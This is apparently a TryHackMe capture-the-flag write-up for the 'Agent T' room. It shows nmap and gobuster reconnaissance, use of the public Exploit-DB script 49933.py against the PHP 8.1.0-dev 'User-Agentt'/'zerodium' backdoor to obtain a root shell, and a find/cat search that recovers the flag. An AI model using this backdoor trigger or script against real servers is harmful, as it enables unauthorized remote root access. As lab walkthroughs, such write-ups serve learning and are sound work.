back

THM - Agent T

Index

1. Executive Summary

Target Info Details
Room Name Agent T
Difficulty Info / Easy
Target IP target-ip
Operating System Linux (Ubuntu 20.04)
Vulnerability PHP 8.1.0-dev Backdoor (User-Agentt Remote Code Execution)
Privilege Level Obtained root

2. Reconnaissance & Enumeration

Network Scanning

An initial port scan using nmap was conducted across all TCP ports to identify running services and version information:

sudo nmap -p- -sV -sC target-ip

no-title

Nmap Results:

  • Port 80/tcp: Open — Running PHP cli server 5.5 or later (PHP 8.1.0-dev)
  • HTTP Title: Admin Dashboard

Web Reconnaissance

Navigating to http://targe-ip in the browser reveals an active Admin Dashboard application.

no-title

A directory enumeration scan was initiated using gobuster:

gobuster dir -u http://target-ip/ -w /usr/share/wordlists/dirb/common.txt

no-title

During enumeration, the server responded with wildcard response behavior across non-existing paths, shifting focus back to the core technology stack identified in the initial port scan.

3. Vulnerability Assessment

From the nmap scan output, the server was identified as running *PHP 8.1.0-dev.

no-title

This specific development build of PHP contains a known backdoor vulnerability in its source code (discovered in early 2021), where sending an HTTP header containing User-Agentt with the keyword zerodium allows arbitrary system command execution.

  • Exploit Database Reference: EDB-ID 49933
  • Vulnerability Type: Remote Code Execution (RCE) / Backdoor
  • Exploit Name: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution

4. Exploitation

Using the public exploit script 49933.py sourced from Exploit-DB, an interactive shell was executed against the target target server:

python 49933.py
Enter the full host url:
http://target-ip/

Interactive shell is opened on http://target-ip/
$ whoami
root

no-title

Because the PHP process was executed under the elevated system context, immediate access was granted as the root user without requiring further privilege escalation.

5. Flag Recovery

With initial access established directly as root, the filesystem was searched for text files:

find / -type f -name "*.txt" 2>/dev/null

no-title

The location of the root flag was identified at /flag.txt. Reading the file provided the final challenge flag:

$ cat /flag.txt
flag{the-flag}

no-title

Copyright © 2026 Mahidul Haque. This post is licensed under a CC BY-NC-ND 4.0 license. You may read, learn, and share links to this post for non‑commercial, educational purposes, as long as you give appropriate attribution. You may not copy, reproduce, adapt, distribute, or use this work commercially without explicit permission.